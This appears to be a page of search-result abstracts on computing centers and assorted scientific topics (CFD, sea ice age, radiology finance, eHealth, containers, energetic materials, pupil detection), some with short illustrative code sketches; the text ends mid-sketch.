    1996-01-01

    Central State University has received a supplementary award to purchase computer workstations for the NPARC (National Propulsion Ames Research Center) computational fluid dynamics code BETA Test Center. The computational code has also been acquired for installation on the workstations. The acquisition of this code is an initial step for CSU in joining an alliance composed of NASA, AEDC, the aerospace industry, and academia. A postdoctoral research fellow from a neighboring university will assist the PI in preparing a template for tutorial documents for the BETA test center. The major objective of the alliance is to establish a national applications-oriented CFD capability, centered on the NPARC code. By joining the alliance, the BETA test center at CSU will allow the PI, as well as undergraduate and post-graduate students, to test the capability of the NPARC code in predicting the physics of aerodynamic/geometric configurations that are of interest to the alliance. Currently, CSU is developing a once-a-year, hands-on conference/workshop based upon the experience acquired from running other codes similar to the NPARC code in the first year of this grant.

  14. BNL ATLAS Grid Computing

    ScienceCinema

    Michael Ernst

    2017-12-09

    As the sole Tier-1 computing facility for ATLAS in the United States and the largest ATLAS computing center worldwide Brookhaven provides a large portion of the overall computing resources for U.S. collaborators and serves as the central hub for storing,

  15. Patient-centered computing: can it curb malpractice risk?

    PubMed

    Bartlett, E E

    1993-01-01

    The threat of a medical malpractice suit represents a major cause of career dissatisfaction for American physicians. Patient-centered computing may improve physician-patient communications, thereby reducing liability risk. This review describes programs that have sought to enhance patient education and involvement pertaining to 5 major categories of malpractice lawsuits: Diagnosis, medications, obstetrics, surgery, and treatment errors.

  16. Patient-centered computing: can it curb malpractice risk?

    PubMed Central

    Bartlett, E. E.

    1993-01-01

    The threat of a medical malpractice suit represents a major cause of career dissatisfaction for American physicians. Patient-centered computing may improve physician-patient communications, thereby reducing liability risk. This review describes programs that have sought to enhance patient education and involvement pertaining to 5 major categories of malpractice lawsuits: Diagnosis, medications, obstetrics, surgery, and treatment errors. PMID:8130563

  17. Initial Comparison of Single Cylinder Stirling Engine Computer Model Predictions with Test Results

    NASA Technical Reports Server (NTRS)

    Tew, R. C., Jr.; Thieme, L. G.; Miao, D.

    1979-01-01

    A Stirling engine digital computer model developed at NASA Lewis Research Center was configured to predict the performance of the GPU-3 single-cylinder rhombic drive engine. Revisions to the basic equations and assumptions are discussed. Model predictions are compared with the early results of the Lewis Research Center GPU-3 tests.

  18. A Report on the Design and Construction of the University of Massachusetts Computer Science Center.

    ERIC Educational Resources Information Center

    Massachusetts State Office of the Inspector General, Boston.

    This report describes a review conducted by the Massachusetts Office of the Inspector General on the construction of the Computer Science and Development Center at the University of Massachusetts, Amherst. The office initiated the review after hearing concerns about the management of the project, including its delayed completion and substantial…

  19. Improved method for sea ice age computation based on combination of sea ice drift and concentration

    NASA Astrophysics Data System (ADS)

    Korosov, Anton; Rampal, Pierre; Lavergne, Thomas; Aaboe, Signe

    2017-04-01

    Sea Ice Age is one of the components of the Sea Ice ECV as defined by the Global Climate Observing System (GCOS) [WMO, 2015]. It is an important climate indicator describing the sea ice state in addition to sea ice concentration (SIC) and thickness (SIT). The amount of old/thick ice in the Arctic Ocean has been decreasing dramatically [Perovich et al. 2015]. Kwok et al. [2009] reported significant decline in the MYI share and consequent loss of thickness and therefore volume. Today, there is only one acknowledged sea ice age climate data record [Tschudi, et al. 2015], based on Maslanik et al. [2011] provided by National Snow and Ice Data Center (NSIDC) [http://nsidc.org/data/docs/daac/nsidc0611-sea-ice-age/]. The sea ice age algorithm [Fowler et al., 2004] is using satellite-derived ice drift for Lagrangian tracking of individual ice parcels (12-km grid cells) defined by areas of sea ice concentration > 15% [Maslanik et al., 2011], i.e. sea ice extent, according to the NASA Team algorithm [Cavalieri et al., 1984]. This approach has several drawbacks. (1) Using sea ice extent instead of sea ice concentration leads to overestimation of the amount of older ice. (2) The individual ice parcels are not advected uniformly over (long) time. This leads to undersampling in areas of consistent ice divergence. (3) The end product grid cells are assigned the age of the oldest ice parcel within that cell, and the frequency distribution of the ice age is not taken into account. In addition, the base sea ice drift product (https://nsidc.org/data/docs/daac/nsidc0116_icemotion.gd.html) is known to exhibit greatly reduced accuracy during the summer season [Sumata et al 2014, Szanyi, 2016] as it only relies on a combination of sea ice drifter trajectories and wind-driven "free-drift" motion during summer. This results in a significant overestimate of old-ice content, incorrect shape of the old-ice pack, and lack of information about the ice age distribution within the grid cells. 
We propose an improved algorithm for sea ice age computation based on a combination of sea ice drift and concentration, both derived from satellite measurements. The base sea ice drift product is from the Ocean and Sea Ice Satellite Application Facility (EUMETSAT OSI-SAF, Lavergne et al., 2011). This operational product was recently upgraded to also process ice drift during the summer season [http://osisaf.met.no/]. The Sea Ice Concentration product from the ESA Sea Ice Climate Change Initiative (ESA SI CCI) project is used to adjust the partial concentrations at every advection step [http://esa-cci.nersc.no/]. Each grid cell is characterised by its partial concentration of water and of ice of different ages. Also, sea ice convergence and divergence are used to realistically adjust the ratio of young ice to multiyear ice. Comparison of results from this new algorithm with results derived from drifting ice buoys deployed in 2013-2016 demonstrates clear improvement in the ice age estimation. The spatial distribution of sea ice age in the new product compares better to the Sea Ice Type derived from satellite passive microwave and scatterometer measurements, both with regard to the decreased patchiness and the shape. The new ice age algorithm is developed in the context of the ESA CCI, and is designed for production of more accurate sea ice age climate data records in the future.
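A minimal single-cell sketch of the bookkeeping described above, tracking partial concentrations of open water and of yearly ice age classes and rescaling them to an observed concentration, might look as follows. The function names and data layout are illustrative assumptions, not the operational code:

```python
# Single-cell sketch of partial-concentration ice age bookkeeping (illustrative).
# fractions[0] is the open-water fraction; fractions[k] (k >= 1) is the fraction
# of ice that is k years old. All fractions sum to 1.

def age_ice(fractions):
    """At a yearly increment, shift every ice class up one year.

    The oldest two classes are merged so the list length stays fixed.
    """
    water, ice = fractions[0], fractions[1:]
    aged = [0.0] + ice[:-1]   # each class becomes one year older
    aged[-1] += ice[-1]       # oldest class absorbs the former oldest
    return [water] + aged

def adjust_to_concentration(fractions, sic):
    """Rescale ice classes so total ice matches observed concentration sic."""
    total_ice = sum(fractions[1:])
    if total_ice == 0.0:
        # no existing ice to redistribute: new ice goes to the youngest class
        return [1.0 - sic, sic] + [0.0] * (len(fractions) - 2)
    scale = sic / total_ice
    return [1.0 - sic] + [f * scale for f in fractions[1:]]
```

In the full algorithm, bookkeeping of this kind would be applied per grid cell after Lagrangian advection with the drift product, with convergence and divergence further adjusting the young-ice to multiyear-ice ratio.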

  20. Higher-order methods for simulations on quantum computers

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Sornborger, A.T.; Stewart, E.D.

    1999-09-01

    To implement many-qubit gates for use in quantum simulations on quantum computers efficiently, we develop and present methods for reexpressing exp[−i(H₁ + H₂ + ⋯)Δt] as a product of factors exp[−iH₁Δt], exp[−iH₂Δt], …, which is accurate to third or fourth order in Δt. The methods we derive are an extended form of the symplectic method, and can also be used for an integration of classical Hamiltonians on classical computers. We derive both integral and irrational methods, and find the most efficient methods in both cases. © 1999 The American Physical Society.
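    As an illustration of the kind of factorization the abstract describes, the standard second-order symmetric decomposition for two non-commuting terms (a textbook result, not the paper's specific higher-order construction) is

```latex
e^{-i(H_1 + H_2)\Delta t}
  = e^{-iH_1 \Delta t/2}\; e^{-iH_2 \Delta t}\; e^{-iH_1 \Delta t/2}
    + \mathcal{O}\!\left(\Delta t^{3}\right)
```

    The paper's methods extend this product form so that the error term is pushed to higher order in Δt.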

  1. Impact of configuration management system of computer center on support of scientific projects throughout their lifecycle

    NASA Astrophysics Data System (ADS)

    Bogdanov, A. V.; Iuzhanin, N. V.; Zolotarev, V. I.; Ezhakova, T. R.

    2017-12-01

    In this article, the support of scientific projects throughout their lifecycle in a computer center is considered in all its aspects. The Configuration Management system plays a connecting role in the processes related to the provision and support of a computer center's services. Given the strong integration of IT infrastructure components through virtualization, control of the infrastructure becomes even more critical to the support of research projects, which raises the requirements on the Configuration Management system. For each aspect of research project support, the influence of the Configuration Management system is reviewed and the development of the corresponding elements of the system is described in the present paper.

  2. Finance for practicing radiologists.

    PubMed

    Berlin, Jonathan W; Lexa, Frank James

    2005-03-01

    This article reviews basic finance for radiologists. Using the example of a hypothetical outpatient computed tomography center, readers are introduced to the concept of net present value. This concept refers to the current real value of anticipated income in the future, realizing that revenue in the future has less value than it does today. Positive net present value projects add wealth to a practice and should be pursued. The article details how costs and revenues for a hypothetical outpatient computed tomography center are determined and elucidates the difference between fixed costs and variable costs. The article provides readers with the steps used to calculate the break-even volume for an outpatient computed tomography center given situation-specific assumptions regarding staff, equipment lease rates, rent, and third-party payer mix.
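    The two calculations the article walks through, net present value and break-even volume, can be sketched as follows. All dollar figures, rates, and volumes here are hypothetical illustrations, not the article's numbers:

```python
# Illustrative finance calculations for a hypothetical outpatient CT center
# (all figures below are made up for the example).

def net_present_value(rate, cashflows):
    """NPV of end-of-year cash flows; cashflows[0] is the year-0 outlay."""
    return sum(cf / (1.0 + rate) ** t for t, cf in enumerate(cashflows))

def break_even_volume(fixed_costs, revenue_per_scan, variable_cost_per_scan):
    """Scans per period needed for contribution margin to cover fixed costs."""
    margin = revenue_per_scan - variable_cost_per_scan
    return fixed_costs / margin

# A $500,000 outlay followed by $150,000 per year for five years, at 8%:
npv = net_present_value(0.08, [-500_000] + [150_000] * 5)
assert npv > 0  # positive NPV: the project adds wealth and should be pursued

# Monthly fixed costs of $60,000; $400 revenue and $50 variable cost per scan:
volume = break_even_volume(60_000, 400, 50)  # about 171.4 scans per month
```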

  3. Readiness of healthcare providers for eHealth: the case from primary healthcare centers in Lebanon.

    PubMed

    Saleh, Shadi; Khodor, Rawya; Alameddine, Mohamad; Baroud, Maysa

    2016-11-10

    eHealth can positively impact the efficiency and quality of healthcare services. Its potential benefits extend to the patient, healthcare provider, and organization. Primary healthcare (PHC) settings may particularly benefit from eHealth. In these settings, healthcare provider readiness is key to successful eHealth implementation. Accordingly, it is necessary to explore the potential readiness of providers to use eHealth tools. Therefore, the purpose of this study was to assess the readiness of healthcare providers working in PHC centers in Lebanon to use eHealth tools. A self-administered questionnaire was used to assess participants' socio-demographics, computer use, literacy, and access, and participants' readiness for eHealth implementation (appropriateness, management support, change efficacy, personal beneficence). The study included primary healthcare providers (physicians, nurses, other providers) working in 22 PHC centers distributed across Lebanon. Descriptive and bivariate analyses (ANOVA, independent t-test, Kruskal Wallis, Tamhane's T2) were used to compare participant characteristics to the level of readiness for the implementation of eHealth. Of the 541 questionnaires, 213 were completed (response rate: 39.4 %). The majority of participants were physicians (46.9 %), and nurses (26.8 %). Most physicians (54.0 %), nurses (61.4 %), and other providers (50.9 %) felt comfortable using computers, and had access to computers at their PHC center (physicians: 77.0 %, nurses: 87.7 %, others: 92.5 %). Frequency of computer use varied. The study found a significant difference for personal beneficence, management support, and change efficacy among different healthcare providers, and relative to participants' level of comfort using computers. There was a significant difference by level of comfort using computers and appropriateness. 
A significant difference was also found between those with access to computers in relation to personal beneficence and change efficacy; and between frequency of computer use and change efficacy. The implementation of eHealth cannot be achieved without the readiness of healthcare providers. This study demonstrates that the majority of healthcare providers at PHC centers across Lebanon are ready for eHealth implementation. The findings of this study can be considered by decision makers to enhance and scale-up the use of eHealth in PHC centers nationally. Efforts should be directed towards capacity building for healthcare providers.

  4. Selected Papers of the Southeastern Writing Center Association.

    ERIC Educational Resources Information Center

    Roberts, David H., Ed.; Wolff, William C., Ed.

    Addressing a variety of concerns of writing center directors and staff, directors of freshman composition, and English department chairs, the papers in this collection discuss writing center research and evaluation, writing center tutors, and computers in the writing center. The titles of the essays and their authors are as follows: (1) "Narrative…

  5. The Hospital-Based Drug Information Center.

    ERIC Educational Resources Information Center

    Hopkins, Leigh

    1982-01-01

    Discusses the rise of drug information centers in hospitals and medical centers, highlighting staffing, functions, typical categories of questions received by centers, and sources used. An appendix of drug information sources included in texts, updated services, journals, and computer databases is provided. Thirteen references are listed. (EJS)

  6. Singularity: Scientific containers for mobility of compute.

    PubMed

    Kurtzer, Gregory M; Sochat, Vanessa; Bauer, Michael W

    2017-01-01

    Here we present Singularity, software developed to bring containers and reproducibility to scientific computing. Using Singularity containers, developers can work in reproducible environments of their choosing and design, and these complete environments can easily be copied and executed on other platforms. Singularity is an open source initiative that harnesses the expertise of system and software engineers and researchers alike, and integrates seamlessly into common workflows for both of these groups. As its primary use case, Singularity brings mobility of computing to both users and HPC centers, providing a secure means to capture and distribute software and compute environments. This ability to create and deploy reproducible environments across these centers, a previously unmet need, makes Singularity a game changing development for computational science.

  7. Singularity: Scientific containers for mobility of compute

    PubMed Central

    Kurtzer, Gregory M.; Bauer, Michael W.

    2017-01-01

    Here we present Singularity, software developed to bring containers and reproducibility to scientific computing. Using Singularity containers, developers can work in reproducible environments of their choosing and design, and these complete environments can easily be copied and executed on other platforms. Singularity is an open source initiative that harnesses the expertise of system and software engineers and researchers alike, and integrates seamlessly into common workflows for both of these groups. As its primary use case, Singularity brings mobility of computing to both users and HPC centers, providing a secure means to capture and distribute software and compute environments. This ability to create and deploy reproducible environments across these centers, a previously unmet need, makes Singularity a game changing development for computational science. PMID:28494014

  8. Deep Space Network (DSN), Network Operations Control Center (NOCC) computer-human interfaces

    NASA Technical Reports Server (NTRS)

    Ellman, Alvin; Carlton, Magdi

    1993-01-01

    The Network Operations Control Center (NOCC) of the DSN is responsible for scheduling the resources of the DSN and monitoring all multi-mission spacecraft tracking activities in real time. Operations performs this job with computer systems at JPL connected to over 100 computers at Goldstone, Australia, and Spain. The old computer system became obsolete, and the first version of the new system was installed in 1991. Significant improvements to the computer-human interfaces became the dominant theme of the replacement project. Major issues required innovative problem solving. Among these issues were: How can several thousand data elements be presented on displays without overloading the operator? What is the best graphical representation of DSN end-to-end data flow? How can the system be operated without memorizing the mnemonics of hundreds of operator directives? Which computing environment will meet the competing performance requirements? This paper presents the technical challenges, engineering solutions, and results of the NOCC computer-human interface design.

  9. Computer Center: Setting Up a Microcomputer Center--1 Person's Perspective.

    ERIC Educational Resources Information Center

    Duhrkopf, Richard, Ed.; Collins, Michael, A. J., Ed.

    1988-01-01

    Considers eight components to be considered in setting up a microcomputer center for use with college classes. Discussions include hardware, software, physical facility, furniture, technical support, personnel, continuing financial expenditures, and security. (CW)

  10. Cloud Computing

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Pete Beckman and Ian Foster

    Chicago Matters: Beyond Burnham (WTTW). Chicago has become a world center of "cloud computing." Argonne experts Pete Beckman and Ian Foster explain what "cloud computing" is and how you probably already use it on a daily basis.

  11. Lift and center of pressure of wing-body-tail combinations at subsonic, transonic, and supersonic speeds

    NASA Technical Reports Server (NTRS)

    Pitts, William C; Nielsen, Jack N; Kaattari, George E

    1957-01-01

    A method is presented for calculating the lift and centers of pressure of wing-body and wing-body-tail combinations at subsonic, transonic, and supersonic speeds. A set of design charts and a computing table are presented which reduce the computations to routine operations. Comparison between the estimated and experimental characteristics for a number of wing-body and wing-body-tail combinations shows correlation to within ±10 percent on lift and to within about ±0.02 of the body length on center of pressure.

  12. The Role of Computers in Research and Development at Langley Research Center

    NASA Technical Reports Server (NTRS)

    Wieseman, Carol D. (Compiler)

    1994-01-01

    This document is a compilation of presentations given at a workshop on the role of computers in research and development at the Langley Research Center. The objectives of the workshop were to inform the Langley Research Center community of the current software systems and software practices in use at Langley. The workshop was organized in 10 sessions: Software Engineering; Software Engineering Standards, Methods, and CASE Tools; Solutions of Equations; Automatic Differentiation; Mosaic and the World Wide Web; Graphics and Image Processing; System Design Integration; CAE Tools; Languages; and Advanced Topics.

  13. Mass storage system experiences and future needs at the National Center for Atmospheric Research

    NASA Technical Reports Server (NTRS)

    Olear, Bernard T.

    1991-01-01

    A summary and viewgraphs of a discussion presented at the National Space Science Data Center (NSSDC) Mass Storage Workshop are included. Some of the experiences of the Scientific Computing Division at the National Center for Atmospheric Research (NCAR) in dealing with the 'data problem' are discussed. A brief history and a development of some basic mass storage system (MSS) principles are given. An attempt is made to show how these principles apply to the integration of various components into NCAR's MSS. Future MSS needs for future computing environments are discussed.

  14. Computer Aided Manufacturing.

    ERIC Educational Resources Information Center

    Insolia, Gerard

    This document contains course outlines in computer-aided manufacturing developed for a business-industry technology resource center for firms in eastern Pennsylvania by Northampton Community College. The four units of the course cover the following: (1) introduction to computer-assisted design (CAD)/computer-assisted manufacturing (CAM); (2) CAM…

  15. Development of automated electromagnetic compatibility test facilities at Marshall Space Flight Center

    NASA Technical Reports Server (NTRS)

    Harrison, Cecil A.

    1986-01-01

    The efforts to automate the electromagnetic compatibility (EMC) test facilities at Marshall Space Flight Center were examined. A battery of nine standard tests is to be integrated by means of a desktop computer-controller in order to provide near real-time data assessment, store the data acquired during testing on flexible disk, and provide computer production of the certification report.

  16. Mind Transplants Or: The Role of Computer Assisted Instruction in the Future of the Library.

    ERIC Educational Resources Information Center

    Lyon, Becky J.

    Computer assisted instruction (CAI) may well represent the next phase in the involvement of the library or learning resources center with media and the educational process. The Lister Hill Center Experimental CAI Network was established in July, 1972, on the recommendation of the National Library of Medicine, to test the feasibility of sharing CAI…

  17. Center for Efficient Exascale Discretizations Software Suite

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Kolev, Tzanio; Dobrev, Veselin; Tomov, Vladimir

    The CEED Software suite is a collection of generally applicable software tools focusing on the following computational motifs: PDE discretizations on unstructured meshes, high-order finite element and spectral element methods, and unstructured adaptive mesh refinement. All of this software is being developed as part of CEED, a co-design Center for Efficient Exascale Discretizations, within DOE's Exascale Computing Project (ECP) program.

  18. The Development of a Learning Dashboard for Lecturers: A Case Study on a Student-Centered E-Learning Environment

    ERIC Educational Resources Information Center

    Santoso, Harry B.; Batuparan, Alivia Khaira; Isal, R. Yugo K.; Goodridge, Wade H.

    2018-01-01

    Student Centered e-Learning Environment (SCELE) is a Moodle-based learning management system (LMS) that has been modified to enhance learning within a computer science department curriculum offered by the Faculty of Computer Science of a large public university in Indonesia. This Moodle provided a mechanism to record students' activities when…

  19. CNC Turning Center Operations and Prove Out. Computer Numerical Control Operator/Programmer. 444-334.

    ERIC Educational Resources Information Center

    Skowronski, Steven D.

    This student guide provides materials for a course designed to instruct the student in the recommended procedures used when setting up tooling and verifying part programs for a two-axis computer numerical control (CNC) turning center. The course consists of seven units. Unit 1 discusses course content and reviews and demonstrates set-up procedures…

  20. Pilot Project in Computer Assisted Instruction for Adult Basic Education Students. Adult Learning Centers, the Adult Program, 1982-83.

    ERIC Educational Resources Information Center

    Buckley, Elizabeth; Johnston, Peter

    In February 1977, computer assisted instruction (CAI) was introduced to the Great Neck Adult Learning Centers (GNALC) to promote greater cognitive and affective growth of educationally disadvantaged adults. The project expanded to include not only adult basic education (ABE) students studying in the learning laboratory, but also ABE students…

  1. The Development of a Robot-Based Learning Companion: A User-Centered Design Approach

    ERIC Educational Resources Information Center

    Hsieh, Yi-Zeng; Su, Mu-Chun; Chen, Sherry Y.; Chen, Gow-Dong

    2015-01-01

    A computer-vision-based method is widely employed to support the development of a variety of applications. In this vein, this study uses a computer-vision-based method to develop a playful learning system, which is a robot-based learning companion named RobotTell. Unlike existing playful learning systems, a user-centered design (UCD) approach is…

  2. CENTER CONDITIONS AND CYCLICITY FOR A FAMILY OF CUBIC SYSTEMS: COMPUTER ALGEBRA APPROACH.

    PubMed

    Ferčec, Brigita; Mahdi, Adam

    2013-01-01

    Using methods of computational algebra we obtain an upper bound for the cyclicity of a family of cubic systems. We overcame the problem of nonradicality of the associated Bautin ideal by moving from the ring of polynomials to a coordinate ring. Finally, we determine the number of limit cycles bifurcating from each component of the center variety.

  3. About High-Performance Computing at NREL | High-Performance Computing |

    Science.gov Websites

    Day(s): First Thursday of every month Hours: 11 a.m. - 12 p.m. Location: ESIF B211-Edison Conference Room Contact: Jennifer Southerland Insight Center - Visualization Tools Day(s): Every Monday Hours: 10 Data System Day(s): Every Monday Hours: 10 a.m. - 11 a.m. Location: ESIF B308-Insight Center

  4. Exploring the Effects of Student-Centered Project-Based Learning with Initiation on Students' Computing Skills: A Quasi-Experimental Study of Digital Storytelling

    ERIC Educational Resources Information Center

    Tsai, Chia-Wen; Shen, Pei-Di; Lin, Rong-An

    2015-01-01

    This study investigated, via quasi-experiments, the effects of student-centered project-based learning with initiation (SPBL with Initiation) on the development of students' computing skills. In this study, 96 elementary school students were selected from four class sections taking a course titled "Digital Storytelling" and were assigned…

  5. High-End Scientific Computing

    EPA Pesticide Factsheets

    EPA uses high-end scientific computing, geospatial services and remote sensing/imagery analysis to support EPA's mission. The Center for Environmental Computing (CEC) assists the Agency's program offices and regions to meet staff needs in these areas.

  6. HPCCP/CAS Workshop Proceedings 1998

    NASA Technical Reports Server (NTRS)

    Schulbach, Catherine; Mata, Ellen (Editor); Schulbach, Catherine (Editor)

    1999-01-01

    This publication is a collection of extended abstracts of presentations given at the HPCCP/CAS (High Performance Computing and Communications Program/Computational Aerosciences Project) Workshop held on August 24-26, 1998, at NASA Ames Research Center, Moffett Field, California. The objective of the Workshop was to bring together the aerospace high performance computing community, consisting of airframe and propulsion companies, independent software vendors, university researchers, and government scientists and engineers. The Workshop was sponsored by the HPCCP Office at NASA Ames Research Center. The Workshop consisted of over 40 presentations, including an overview of NASA's High Performance Computing and Communications Program and the Computational Aerosciences Project; ten sessions of papers representative of the high performance computing research conducted within the Program by the aerospace industry, academia, NASA, and other government laboratories; two panel sessions; and a special presentation by Mr. James Bailey.

  7. Novel LLM series high density energy materials: Synthesis, characterization, and thermal stability

    NASA Astrophysics Data System (ADS)

    Pagoria, Philip; Zhang, Maoxi; Tsyshevskiy, Roman; Kuklja, Maija

    Novel high density energy materials must satisfy specific requirements, such as an increased performance, reliably high stability to external stimuli, cost-efficiency and ease of synthesis, be environmentally benign, and be safe for handling and transportation. During the last decade, the attention of researchers has drifted from widely used nitroester-, nitramine-, and nitroaromatic-based explosives to nitrogen-rich heterocyclic compounds. Good thermal stability, the low melting point, high density, and moderate sensitivity make heterocycle materials attractive candidates for use as oxidizers in rocket propellants and fuels, secondary explosives, and possibly as melt-castable ingredients of high explosive formulations. In this report, the synthesis, characterization, and results of quantum-chemical DFT study of thermal stability of LLM-191, LLM-192 and LLM-200 high density energy materials are presented. Work performed under the auspices of the DOE by the LLNL (Contract DE-AC52-07NA27344). This research is supported in part by ONR (Grant N00014-12-1-0529) and NSF. We used NSF XSEDE (Grant DMR-130077) and DOE NERSC (Contract DE-AC02-05CH11231) resources.

  8. Non-resonant divertors for stellarators

    NASA Astrophysics Data System (ADS)

    Boozer, Allen; Punjabi, Alkesh

    2017-10-01

    The outermost confining magnetic surface in optimized stellarators has sharp edges, which resemble tokamak X-points. The plasma cross section has an even number of edges at the beginning of a period but an odd number halfway through it. Magnetic field lines cannot cross sharp edges, but stellarator edges have a finite length and do not determine the rotational transform on the outermost confining surface. Just outside the last confining surface, surfaces formed by magnetic field lines have splits containing two adjacent magnetic flux tubes: one with entering flux and the other with an equal exiting flux to the walls. The splits become wider with distance outside the outermost confining surface. These flux tubes form natural non-resonant stellarator divertors, which we are studying using maps. This work is supported by the US DOE Grants DE-FG02-95ER54333 to Columbia University and DE-FG02-01ER54624 and DE-FG02-04ER54793 to Hampton University and used resources of the NERSC, supported by the Office of Science, US DOE, under Contract No. DE-AC02-.

  9. Flow and Sedimentation of particulate suspensions in Fractures

    NASA Astrophysics Data System (ADS)

    Lo, Tak Shing; Koplik, Joel

    2011-03-01

    Suspended particles are commonly found in reservoir fluids. They alter the rheology of the flowing liquids and may obstruct transport by narrowing flow channels due to gravitational sedimentation. An understanding of the dynamics of particle transport and deposition is, therefore, important to many geological, environmental and industrial processes. Realistic geological fractures usually have irregular surfaces with self-affine structures, and the surface roughness plays a crucial role in the flow and sedimentation processes. Recently, we have used the lattice Boltzmann method to study the combined effects of sedimentation and transport of particles suspended in a Newtonian fluid in a pressure-driven flow in self-affine channels, which is especially relevant to clogging phenomena where sediments may block fluid flows in narrow constrictions of the channels. The lattice Boltzmann method is flexible and particularly suitable for handling irregular geometry. Our work covers a broad range in Reynolds and buoyancy numbers, and in particle concentrations. In this talk, we focus on the transitions between the ``jammed'' and the ``flow'' states in fractures, and on the effects of nonuniform particle size distributions. Work supported by DOE and NERSC.

  10. NASA Center for Climate Simulation (NCCS) Advanced Technology AT5 Virtualized Infiniband Report

    NASA Technical Reports Server (NTRS)

    Thompson, John H.; Bledsoe, Benjamin C.; Wagner, Mark; Shakshober, John; Fromkin, Russ

    2013-01-01

    The NCCS is part of the Computational and Information Sciences and Technology Office (CISTO) of Goddard Space Flight Center's (GSFC) Sciences and Exploration Directorate. The NCCS's mission is to enable scientists to increase their understanding of the Earth, the solar system, and the universe by supplying state-of-the-art high performance computing (HPC) solutions. To accomplish this mission, the NCCS (https://www.nccs.nasa.gov) provides high performance compute engines, mass storage, and network solutions to meet the specialized needs of the Earth and space science user communities.

  11. ED adds business center to wait area.

    PubMed

    2007-10-01

    Providing your patients with Internet access in the waiting area can do wonders for their attitudes and make them much more understanding of long wait times. What's more, it doesn't take a fortune to create a business center. The ED at Florida Hospital Celebration (FL) Health made a world of difference with just a couple of computers and a printer. Have your information technology staff set the computers up to preserve the privacy of your internal computer system, and block out offensive sites. Access to medical sites can help reinforce your patient education efforts.

  12. Application of technology developed for flight simulation at NASA. Langley Research Center

    NASA Technical Reports Server (NTRS)

    Cleveland, Jeff I., II

    1991-01-01

    In order to meet the stringent time-critical requirements for real-time man-in-the-loop flight simulation, computer processing operations including mathematical model computation and data input/output to the simulators must be deterministic and be completed in as short a time as possible. Personnel at NASA's Langley Research Center are currently developing the use of supercomputers for simulation mathematical model computation for real-time simulation. This, coupled with the use of an open systems software architecture, will advance the state-of-the-art in real-time flight simulation.

  13. Implementing the Data Center Energy Productivity Metric in a High Performance Computing Data Center

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Sego, Landon H.; Marquez, Andres; Rawson, Andrew

    2013-06-30

    As data centers proliferate in size and number, the improvement of their energy efficiency and productivity has become an economic and environmental imperative. Making these improvements requires metrics that are robust, interpretable, and practical. We discuss the properties of a number of the proposed metrics of energy efficiency and productivity. In particular, we focus on the Data Center Energy Productivity (DCeP) metric, which is the ratio of useful work produced by the data center to the energy consumed performing that work. We describe our approach for using DCeP as the principal outcome of a designed experiment using a highly instrumented, high-performance computing data center. We found that DCeP was successful in clearly distinguishing different operational states in the data center, thereby validating its utility as a metric for identifying configurations of hardware and software that would improve energy productivity. We also discuss some of the challenges and benefits associated with implementing the DCeP metric, and we examine the efficacy of the metric in making comparisons within a data center and between data centers.
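
    The DCeP ratio described in the abstract can be sketched in a few lines. The task values and energy figure below are invented for illustration; the published metric weights each completed task by its assessed value before dividing by the energy consumed.

```python
# Minimal sketch of Data Center Energy Productivity (DCeP):
# useful work produced divided by the energy consumed producing it.
# Task values and the energy figure are illustrative only.

def dcep(task_values, energy_consumed_kwh):
    """DCeP: weighted useful work per unit of energy consumed."""
    useful_work = sum(task_values)       # value-weighted completed tasks
    return useful_work / energy_consumed_kwh

# Three completed jobs with relative values 120, 80, and 50,
# run during a measurement window that consumed 500 kWh.
print(dcep([120.0, 80.0, 50.0], 500.0))  # 0.5 units of work per kWh
```

    Comparing DCeP across operational states, as the study does, then reduces to computing this ratio for each hardware/software configuration over the same measurement window.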

  14. ENVIRONMENTAL BIOINFORMATICS AND COMPUTATIONAL TOXICOLOGY CENTER

    EPA Science Inventory

    The Center activities focused on integrating developmental efforts from the various research projects of the Center, and collaborative applications involving scientists from other institutions and EPA, to enhance research in critical areas. A representative sample of specif...

  15. Improving User Notification on Frequently Changing HPC Environments

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Fuson, Christopher B; Renaud, William A

    2016-01-01

    Today's HPC center user environments can be very complex. Centers often contain multiple large, complicated computational systems, each with its own user environment. Changes to a system's environment can be very impactful; however, a center's user environment is, in one way or another, frequently changing. Because of this, it is vital for centers to notify users of change. For users, untracked changes can be costly, resulting in unnecessary debug time as well as wasted compute allocations and research time. Communicating frequent change to diverse user communities is a common and ongoing task for HPC centers. This paper will cover the OLCF's current processes and methods used to communicate change to users of the center's large Cray systems and supporting resources. The paper will share lessons learned and goals as well as practices, tools, and methods used to continually improve and reach members of the OLCF user community.

  16. Robust pupil center detection using a curvature algorithm

    NASA Technical Reports Server (NTRS)

    Zhu, D.; Moore, S. T.; Raphan, T.; Wall, C. C. (Principal Investigator)

    1999-01-01

    Determining the pupil center is fundamental for calculating eye orientation in video-based systems. Existing techniques are error prone and not robust because eyelids, eyelashes, corneal reflections or shadows in many instances occlude the pupil. We have developed a new algorithm which utilizes curvature characteristics of the pupil boundary to eliminate these artifacts. Pupil center is computed based solely on points related to the pupil boundary. For each boundary point, a curvature value is computed. Occlusion of the boundary induces characteristic peaks in the curvature function. Curvature values for normal pupil sizes were determined and a threshold was found which together with heuristics discriminated normal from abnormal curvature. Remaining boundary points were fit with an ellipse using a least squares error criterion. The center of the ellipse is an estimate of the pupil center. This technique is robust and accurately estimates pupil center with less than 40% of the pupil boundary points visible.
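
    The pipeline the abstract describes (discrete curvature along the boundary, a threshold that rejects occlusion-induced curvature peaks, then a least-squares fit to the surviving points) can be sketched as follows. This is an illustrative reconstruction, not the authors' code: a circle fit stands in for their ellipse fit to keep the example short, and the curvature threshold is invented.

```python
# Sketch of curvature-based pupil-center estimation: compute a
# discrete curvature (turning angle) at each boundary point, drop
# points with anomalous curvature (eyelid/reflection artifacts
# produce sharp peaks), and least-squares fit the remainder.
import numpy as np

def discrete_curvature(pts):
    """Absolute turning angle at each vertex of a closed boundary."""
    prev, nxt = np.roll(pts, 1, axis=0), np.roll(pts, -1, axis=0)
    v1, v2 = pts - prev, nxt - pts
    ang = np.arctan2(v2[:, 1], v2[:, 0]) - np.arctan2(v1[:, 1], v1[:, 0])
    return np.abs((ang + np.pi) % (2 * np.pi) - np.pi)

def pupil_center(boundary, max_curvature=0.3):
    """Circle fit (Kasa method) to boundary points of normal curvature."""
    keep = boundary[discrete_curvature(boundary) < max_curvature]
    # x^2 + y^2 = 2*cx*x + 2*cy*y + c is linear in (cx, cy, c).
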